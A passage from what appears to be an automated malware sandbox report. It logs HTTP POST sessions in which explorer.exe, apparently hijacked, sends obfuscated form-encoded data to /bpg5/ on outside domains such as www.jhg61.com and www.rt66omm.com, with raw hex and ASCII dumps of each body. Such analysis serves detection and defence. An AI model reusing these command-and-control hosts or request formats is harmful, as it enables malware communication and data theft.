                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 57 78 7a 4a 79 6e 6e 4c 45 46 58 43 71 47 58 6b 35 36 42 68 70 4a 5f 31 44 6c 38 43 65 6c 35 36 51 77 39 35 6f 49 4d 74 56 35 55 65 78 68 66 4f 6b 6d 74 42 44 38 57 37 39 48 71 63 33 4c 76 75 4e 6f 78 4e 6b 4b 7a 6e 37 74 51 28 63 58 4d 75 45 4a 75 45 68 44 56 6e 41 50 6f 6f 31 47 45 4e 5f 35 6f 6d 38 28 32 6e 53 76 76 72 56 57 71 75 6c 5a 63 78 42 4e 6f 4d 61 6b 37 38 53 65 65 33 32 59 77 53 4a 70 4e 35 6f 34 56 46 7a 61 35 79 65 47 5f 48 43 4f 70 79 69 6a 38 4c 56 59 36 4f 4d 73 4c 36 44 65 43 6c 52 72 66 73 57 67 71 77 50 61 5a 66 49 36 43 6a 7a 76 45 7e 43 75 33 74 37 4d 4a 30 54 36 46 76 39 73 36 52 70 6e 79 69 5f 73 51 5a 76 77 73 73 57 72 69 78 6e 36 48 47 39 33 6b 42 41 49 66 46 73 55 70 35 43 67 53 65 5f 68 50 65 6d 32 5a 30 33 37 46 77 6e 4e 52 33 44 78 42 66 2d 69 57 46 36 45 46 7a 78 48 5f 42 55 6d 43 69 71 45 53 48 79 61 57 6f 44 54 78 77 47 42 4f 67 37 49 79 54 6d 4d 53 7e 33 37 67 72 75 57 38 45 4c 4e 71 77 59 51 49 4e 65 58 54 57 76 37 31 62 54 6c 71 5a 66 31 50 72 44 35 50 6d 38 55 68 50 78 36 61 48 47 71 61 79 73 70 49 32 76 39 5a 71 37 5a 31 68 46 32 6c 74 33 66 73 65 4c 28 6c 7a 6f 28 4e 30 4e 28 57 6b 4f 47 5f 4a 36 36 41 69 77 6c 54 66 54 35 44 59 2d 66 77 62 6c 61 41 52 73 7a 73 4e 76 31 45 4e 47 4e 6a 66 56 49 4f 6c 53 77 6b 70 6a 66 44 54 5f 48 41 69 47 4c 6e 34 5a 33 6c 72 57 75 78 54 4a 56 4e 43 66 58 52 61 78 61 70 49 4e 48 6c 61 4a 34 36 6e 48 35 61 54 67 53 67 6c 63 52 49 61 74 28 71 61 53 72 36 37 6c 6a 59 71 74 57 57 38 2d 33 47 41 50 56
                                                    Data Ascii: 8mBWmPn=jKc5GkmqQWJekDmjcSfAcgn2fq6Dle3OtzPR2QyTx2or25bp0CYB5rSZFNhej1JopUz0Vvn1yE2zgMRiVgYLBFSlq7(qew7kPmZR2Q59~7boXybxLT5RL7rLMVkU98NMEYJ6z9PogW8TUPrGpk80r0h5NTFKSBDewVp-zkbu4mRuHXoBatAl0ppMP30B2Z3ErwWmm2A9T0A-~pjSUh(JXLJ-bTKWjCNELx~kjWikEdlAr9vgaiAnE0YphEerXp2lXdw5EENSNhr1YLtmsVy7pToYV47B8g1SE2kBlL7TDykDtKF6aDynijfS9851Czurpkyo996evdxyeJ7X5OASj_4nLl5EUbcvG2DKNH~C8v5OR6tX0B0ycKDWkJALqwPWn1gDDeg-vSgOeU(AKgBVKHpOd_8A(OVleVAvn230TO0lRQl7iv7an65ymhwdpr93QN342uT97PP_~AS3WsMWT9UlRukXIEjL~WsIhsCQOGETxqlDOiPyL7d2MgyCzZD8J9cvh6se6BtoQFDvtWKstt3x98IXI5Y6EQyGr3aeBdAmPxtb0plJMKVsqlaBul0-sGT3y-I4glyoguqO4TmOBHfOcrFv9hm1q09xJg(d58EgMba7JOqkaltrCBxYBJFX2MegLp8s1wRN(NlSqD9coyFkG373UROtFMMfmO482rJvhmpV~fPqz5SxUqVQccQQV4ATUzbbKJnkJ-wY~nhI2-VKIaP0HLFk6k8ZHMR1(FDN87kGq5ERvix-lmPleELzxgXzzypjChrFShI8p0OQ84vb1BCdT1WX3QFbsjQcMszssOpuhar_LQZDhvPTQupLokr9PGnXVceu4H~fAROl2qnv1WxzJynnLEFXCqGXk56BhpJ_1Dl8Cel56Qw95oIMtV5UexhfOkmtBD8W79Hqc3LvuNoxNkKzn7tQ(cXMuEJuEhDVnAPoo1GEN_5om8(2nSvvrVWqulZcxBNoMak78See32YwSJpN5o4VFza5yeG_HCOpyij8LVY6OMsL6DeClRrfsWgqwPaZfI6CjzvE~Cu3t7MJ0T6Fv9s6Rpnyi_sQZvwssWrixn6HG93kBAIfFsUp5CgSe_hPem2Z037FwnNR3DxBf-iWF6EFzxH_BUmCiqESHyaWoDTxwGBOg7IyTmMS~37gruW8ELNqwYQINeXTWv71bTlqZf1PrD5Pm8UhPx6aHGqayspI2v9Zq7Z1hF2lt3fseL(lzo(N0N(WkOG_J66AiwlTfT5DY-fwblaARszsNv1ENGNjfVIOlSwkpjfDT_HAiGLn4Z3lrWuxTJVNCfXRaxapINHlaJ46nH5aTgSglcRIat(qaSr67ljYqtWW8-3GAPVrsxbPdIkl4N1PBpZMsLh2B1fNa6nkjhY49PXS9P2al0s2zc2f9WDihS0dHSlAsnn2Gqy2T71QPVT9YxoLUisD61Yr8mfvcEiSYhOL3Ye0aEdlTTUuuTQq3Q).
                                                    May 19, 2023 17:51:21.243870020 CEST36INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:21 GMT
                                                    Server: Apache/2.4.57 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    10192.168.2.449707150.129.40.980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:54.257882118 CEST53OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.jhg61.com
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.jhg61.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.jhg61.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 6b 4d 7a 56 7a 76 66 53 45 47 53 6f 36 5f 61 65 41 38 63 71 79 48 77 66 63 79 59 4b 6d 33 57 50 43 69 73 6a 51 72 47 64 6c 42 6c 56 64 37 41 75 78 6a 6e 67 54 44 48 4e 36 41 6b 70 75 77 30 56 78 52 7e 6f 70 55 64 49 70 4c 72 4c 59 53 48 47 68 57 41 4c 6d 7a 33 6b 63 49 77 75 53 65 66 63 77 6b 58 5f 6c 69 49 54 79 76 41 2d 73 75 58 61 79 4a 6b 41 34 2d 65 57 4b 4c 58 68 4c 68 48 46 59 47 79 73 52 66 47 63 41 4d 71 58 4d 56 6b 43 67 71 4a 57 42 49 7e 31 4e 71 41 70 51 41 35 42 52 74 46 6b 4d 75 51 61 47 37 59 69 45 54 56 32 6f 4e 54 41 77 5f 70 7a 52 5a 71 52 6d 4e 36 59 5a 33 67 48 74 34 6b 33 4e 57 75 49 50 72 38 77 70 61 70 7a 7a 43 35 36 6b 41 44 6d 46 59 32 53 55 64 78 7a 66 64 4a 34 30 43 64 7a 68 52 38 2d 76 48 59 66 38 59 36 74 78 64 45 33 62 49 42 48 61 69 33 73 62 52 34 6f 33 49 28 52 45 70 6d 66 39 72 69 73 67 49 57 53 33 79 73 5a 63 50 4e 36 52 37 55 59 7e 73 55 34 30 55 58 44 55 36 54 34 31 70 55 34 72 53 37 35 59 4e 71 69 37 68 71 54 67 39 4a 30 6c 56 71 57 50 59 41 76 55 64 4b 48 35 6a 71 39 41 51 32 6b 4d 4d 38 32 4a 6a 58 63 62 78 46 64 74 6b 34 43 6c 4e 37 45 43 46 46 30 31 6b 42 7a 53 67 47 61 59 53 55 6f 4f 36 62 55 47 61 31 77 30 6d 30 57 69 33 62 4c 30 77 68 46 74 68 42 62 36 42 34 33 4e 67 74 37 45 76 70 79 59 66 71 36 28 7a 28 44 6b 71 6d 41 57 38 57 30 50 77 6c 50 57 74 6d 53 35 57 32 52 56 49 7a 30 34 64 6a 67 6a 6d 4f 4b 59 4f 52 69 36 5a 37 42 4a 63 37 30 4b 5a 6e 5f 68 51 62 67 4a 74 61 68 46 2d 5a 6a 28 58 6c 41 6c 42 56 4d 35 63 52 53 6f 52 79 48 73 4c 78 52 36 41 4d 38 54 43 28 52 61 2d 59 62 56 58 36 72 57 45 67 51 74 75 6a 76 64 53 77 35 76 63 4a 6b 48 71 51 46 58 71 76 4f 36 42 54 62 7a 4e 38 49 7a 7a 6a 55 6a 70 6a 6c 38 72 44 48 4e 78 54 76 77 7a 6e 62 33 6f 78 4c 55 6e 45 72 45 67 38 54 43 30 28 30 56 36 6a 49 55 6d 55 58 37 6d 69 33 5a 50 44 73 7e 4d 64 6c 64 72 51 4d 43 35 4e 6b 65 65 6b 34 4f 73 71 6c 48 53 51 2d 37 76 56 6c 30 48 64 61 4b 44 47 65 32 32 55 74 4b 38 72 35 49 69 4d 36 52 6c 39 32 78 4e 76 35 72 68 77 39 4f 37 61 7a 58 55 73 33 37 55 41 5a 74 57 73 43 7a 6e 79 68 48 4b 65 46 4f 78 73 41 7a 31 75 79 53 76 4c 41 61 4e 4e 44 54 62 47 4c 51 38 4c 71 45 7a 6c 34 59 54 79 33 45 61 49 65 51 43 47 59 58 4d 32 77 7e 34 35 67 7e 45 6b 74 51 74 36 31 4d 63 35 4e 52 4e 59 61 30 63 66 62 79 39 79 49 6b 62 38 47 70 5f 61 41 61 67 38 39 57 31 61 33 6e 6c 4c 78 77 6d 43 47 6d 39 54 61 71 52 48 75 51 52 4b 52 38 30 44 2d 32 71 61 58 45 5f 6f 68 77 5f 75 4b 34 75 36 54 66 79 72 75 77 6e 58 4c 71 66 65 42 7e 6c 57 50 46 32 62 37 4d 59 47 45 34 47 63 73 35 56 54 57 32 7a 37 4c 4c 66 43 4f 32 37 73 45 74 65 43 33 33 76 43 54 31 57 6d 46 77 4d 4f 52 6f 62 68 71 7e 30 52 49 58 61 56 34 4b 57 4f 66 6b 68 41 77 69 56 49 70 6c 7a 72 7a 71 43 35 7a 74 52 44 55 37 43 33 33 6a 6e 38 58 36 55 45 5a 4a 35 59 35 55 55 4e 47 4e 7a 74 4e 31 61 62 39 79 5f 30 5a 36 30 73 68 48 30 67 33 4b 65 78 6c 53 2d 75 68 6c 56 59 63 65 50 36 59 59 4a 30 36 51 76 6d 61 59 58 76 48 6f 79 44 6d 78 47 41 37 76 5a 79 4b 77 4a 70 44 69 7a 46 6b 4c 34 51 71 75 50 31 74 57 6b 6a 37 77 6e 28 70 6d 44 66 7a 75 45 4c 48 68 69 62 72 55 52 55 4f 57 47 54 69 4b 6e 7a 4e 43 73 72 74 72 54 42 78 58 47 47 65 78 52 49 54 54 75 32 4b 35 72 57 6b 56 35 51 44 4a 6a 4e 6c 57 79 61 46 69 68 51 68 70 7a 6d 39 4d 71 56 7a 66 55 41 4f 46 71 4f 78 4e 44 55 6d 4d 49 6c 2d 6a 47 6d 50 4f 6d 67 4e 30 64 75 2d 67 33 4b 55 72 77 46 43 71 4e 33 33 57 6a 6a 71 28 79 69 79 72 51 6f 70 4b 4a 4d 73 4d 2d 6f 38 53 45 48 62 6f 50 33 45 74 79 6a 76 39 67 77 38 50 7a 64 50 52 63 6f 63 76 31 4d 6f 6b 4a 41 2d 55 34 55 44 59 54 67 72 41 6f 6f 5f 46 4c 70 4b 34 5a 36 61 37 5a 6a 48 74 34 71 74 57 55 62 76 35 6d 76 45 72 6d 34 2d 61 68 4c 65 63 6d 4e 75 6c 38 6b 53 6a 34 58 44 68 32 56 76 75 75 4a 48 6d 5a 78 32 48 54 7a 6d 75 6b 4a 4f 70 6a 31 52 37 72 5a 42 34 42 56 49 77 38 30 41 4b 44 79 71 39 64 45 45 53 6b 57 30 59 59 37 61 31 67 41 7a 75 79 69 59 6e 46 4c 68 33 37 6f 79 74 38 33 49 61 63 71 76 6c 76 71 35 71 50 51 4b 33 54 42 57 56 48 69 52 42 57 78 2d 4b 64 43 64 49 4b 70 4d 35 63 42 79 59 66 58 65 63 4d 28 78 55 77 52
                                                    Data Ascii: 8mBWmPn=kMzVzvfSEGSo6_aeA8cqyHwfcyYKm3WPCisjQrGdlBlVd7AuxjngTDHN6Akpuw0VxR~opUdIpLrLYSHGhWALmz3kcIwuSefcwkX_liITyvA-suXayJkA4-eWKLXhLhHFYGysRfGcAMqXMVkCgqJWBI~1NqApQA5BRtFkMuQaG7YiETV2oNTAw_pzRZqRmN6YZ3gHt4k3NWuIPr8wpapzzC56kADmFY2SUdxzfdJ40CdzhR8-vHYf8Y6txdE3bIBHai3sbR4o3I(REpmf9risgIWS3ysZcPN6R7UY~sU40UXDU6T41pU4rS75YNqi7hqTg9J0lVqWPYAvUdKH5jq9AQ2kMM82JjXcbxFdtk4ClN7ECFF01kBzSgGaYSUoO6bUGa1w0m0Wi3bL0whFthBb6B43Ngt7EvpyYfq6(z(DkqmAW8W0PwlPWtmS5W2RVIz04djgjmOKYORi6Z7BJc70KZn_hQbgJtahF-Zj(XlAlBVM5cRSoRyHsLxR6AM8TC(Ra-YbVX6rWEgQtujvdSw5vcJkHqQFXqvO6BTbzN8IzzjUjpjl8rDHNxTvwznb3oxLUnErEg8TC0(0V6jIUmUX7mi3ZPDs~MdldrQMC5Nkeek4OsqlHSQ-7vVl0HdaKDGe22UtK8r5IiM6Rl92xNv5rhw9O7azXUs37UAZtWsCznyhHKeFOxsAz1uySvLAaNNDTbGLQ8LqEzl4YTy3EaIeQCGYXM2w~45g~EktQt61Mc5NRNYa0cfby9yIkb8Gp_aAag89W1a3nlLxwmCGm9TaqRHuQRKR80D-2qaXE_ohw_uK4u6TfyruwnXLqfeB~lWPF2b7MYGE4Gcs5VTW2z7LLfCO27sEteC33vCT1WmFwMORobhq~0RIXaV4KWOfkhAwiVIplzrzqC5ztRDU7C33jn8X6UEZJ5Y5UUNGNztN1ab9y_0Z60shH0g3KexlS-uhlVYceP6YYJ06QvmaYXvHoyDmxGA7vZyKwJpDizFkL4QquP1tWkj7wn(pmDfzuELHhibrURUOWGTiKnzNCsrtrTBxXGGexRITTu2K5rWkV5QDJjNlWyaFihQhpzm9MqVzfUAOFqOxNDUmMIl-jGmPOmgN0du-g3KUrwFCqN33Wjjq(yiyrQopKJMsM-o8SEHboP3Etyjv9gw8PzdPRcocv1MokJA-U4UDYTgrAoo_FLpK4Z6a7ZjHt4qtWUbv5mvErm4-ahLecmNul8kSj4XDh2VvuuJHmZx2HTzmukJOpj1R7rZB4BVIw80AKDyq9dEESkW0YY7a1gAzuyiYnFLh37oyt83Iacqvlvq5qPQK3TBWVHiRBWx-KdCdIKpM5cByYfXecM(xUwRyHzI6pVUnqxLCkH1At5GYdecGPRAu~UCXExFojk8LJCvi5hYmJfPQbNR4RGhXXe9FeBGcPsmBrIsIzT3UA2QVl0XNoD5exr2zbaHzz116bmN4Ttgd9uFmNg).


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    11192.168.2.449710118.27.125.17280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:52:12.960633039 CEST58OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.rt66omm.com
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.rt66omm.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.rt66omm.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 31 45 47 6c 61 74 4a 66 7e 33 4d 38 47 62 43 44 51 6c 4d 4d 46 38 53 77 76 39 5a 7a 6f 56 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 33 6f 56 66 49 35 4c 70 39 4c 42 66 58 41 2d 59 70 44 33 67 4d 67 36 6b 49 63 46 46 33 61 36 79 63 51 75 5a 4f 39 72 49 6e 57 44 68 67 62 54 72 34 47 71 76 55 70 41 67 6e 45 38 37 4c 30 6c 5a 46 64 67 64 4a 4a 58 6b 72 30 77 34 41 42 59 37 6c 39 42 50 4d 5a 4a 72 79 4b 61 45 33 55 71 4d 43 79 6f 6d 61 67 6c 55 2d 70 47 31 6a 32 6a 4b 5f 30 70 48 57 66 4c 43 6a 62 35 68 46 46 39 6c 31 39 75 37 33 64 33 45 45 50 39 69 4e 73 44 73 66 6e 6c 34 47 38 6a 43 65 76 4f 47 47 77 46 64 43 34 62 63 7a 62 5a 33 78 76 74 62 46 4b 75 72 61 39 61 72 56 47 46 7e 77 4d 42 4e 5a 58 74 58 71 32 6e 4a 58 7a 4a 37 46 6b 4e 34 32 62 36 43 41 77 44 4e 62 73 6b 48 46 76 4a 31 66 7e 73 57 61 6e 62 50 41 6a 37 6f 53 6e 59 6a 69 46 64 4d 51 4c 57 65 33 71 68 70 58 6a 32 69 68 68 48 47 4a 62 42 32 79 6f 6a 6f 76 4a 57 34 61 6f 76 70 31 34 44 76 56 39 67 38 69 47 56 74 58 34 7a 67 6b 66 4e 4f 37 7e 7a 55 49 4c 76 45 45 67 4b 5a 6b 6a 45 32 63 78 37 4a 59 53 65 4a 4a 41 65 76 69 63 6c 6e 37 63 4e 35 63 6e 76 6c 74 42 4e 69 43 41 34 59 64 46 6d 6a 55 32 6c 53 65 31 37 51 64 4b 32 42 6a 77 51 7e 7a 64 38 63 78 48 42 69 34 69 78 6f 6b 53 64 34 6e 45 67 41 32 32 2d 39 6a 6c 41 78 4b 6e 7a 5a 36 7a 77 47 72 48 41 45 65 53 55 56 6a 47 6f 56 69 64 65 44 49 61 4c 28 31 6a 7a 67 67 6a 37 35 50 52 42 42 47 59 68 42 72 53 34 49 75 4a 43 32 4b 62 72 34 76 7a 39 68 56 34 37 4f 77 75 4b 47 5f 36 61 7e 55 62 62 51 41 75 51 6e 4c 43 35 7e 38 61 59 4b 6f 6a 39 76 4b 65 33 75 6f 33 35 4c 30 33 35 4c 4c 71 61 53
                                                    Data Ascii: 8mBWmPn=bnjuuu8f3kRfdIF8TH0tCbh4hqVXzwUz7m3fJE~pHNAisGFrJB1Srdx9h1jkYK(8TNPj(n5W3jUL4XhOm6d3GPW-qX4CvELBdsteJLLi1pKC1GL-l7vpumNNHVtSvonJ4CNKirQ_QXWQIcdbagDlIrdAm3Zc7eCNl-bC3UO7lCNR6mCj5CS6mPqr7YOolgKHTXjbc4IPa-iKtNi_GHKnRYpMNCQ_8qP1NUOSPQsCKCjnNP5QhUSeFV0tRGE4UFvaJmrGa1aewhuiVeaodP2D3Q2z1EGlatJf~3M8GbCDQlMMF8Swv9ZzoVBaZaEM54e0DWgUV_ldnuW4DP0MTpHrIiQSeIaI6C3IAyJq6e(Z1ecqNF1XAl6-WyA_EIS665qSP3HWLfdcQUESzsRvPQCp3VBj9F(IKKThf9uJynNGWr6XPPE2vxZV~GBfc4B7(gAa7QcZtp0ZJzroU4qM6bVR156PNFAJtwDuiN1O29rtaq6cA64pWvnNd78VRvQ0Jw5FFHQCGg7ifERAOrkelhuM7-CAe05cJc~-8hfLTTk2fretTd9EETC2kEE77EgwAepwdreJI9nJPmCz2etEc7IEcb0omIcQRMHd0NmyeaQowiGBHVmO4ZYQdy9qX4e0jNPs4rBR56oT2sDxp-B3gv9Ne9f46f7ObavCDQvIbvXI8sE-SE6P4Ck9tjXtkJ0HkeSpXUkul8nMybruYOiS~rYRMEPOeWEjT0kT6V0ZCt4AMtxqXOn8YzjSTXVyDwDe98kmIa2_vYKROazlkcQ0ijfQDrBYguiFzaAOH-um3atZt431Oi0VOv794cOxiHqMf2UBRoDVDonRZ26tTBglvPvpL3PrLdo3oVfI5Lp9LBfXA-YpD3gMg6kIcFF3a6ycQuZO9rInWDhgbTr4GqvUpAgnE87L0lZFdgdJJXkr0w4ABY7l9BPMZJryKaE3UqMCyomaglU-pG1j2jK_0pHWfLCjb5hFF9l19u73d3EEP9iNsDsfnl4G8jCevOGGwFdC4bczbZ3xvtbFKura9arVGF~wMBNZXtXq2nJXzJ7FkN42b6CAwDNbskHFvJ1f~sWanbPAj7oSnYjiFdMQLWe3qhpXj2ihhHGJbB2yojovJW4aovp14DvV9g8iGVtX4zgkfNO7~zUILvEEgKZkjE2cx7JYSeJJAevicln7cN5cnvltBNiCA4YdFmjU2lSe17QdK2BjwQ~zd8cxHBi4ixokSd4nEgA22-9jlAxKnzZ6zwGrHAEeSUVjGoVideDIaL(1jzggj75PRBBGYhBrS4IuJC2Kbr4vz9hV47OwuKG_6a~UbbQAuQnLC5~8aYKoj9vKe3uo35L035LLqaST5-sEGBGkjAP7~piBXFSIDNo1ufKr7Lf7h45CpIwS0o5RDWW3MdwPRO1d7v48MhKrh6GmxJON9zaQ6et36bs9SiHxBPSyzN~SDqfakasX82V6sEglrwwuNQ).
                                                    May 19, 2023 17:52:13.369484901 CEST59INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:52:13 GMT
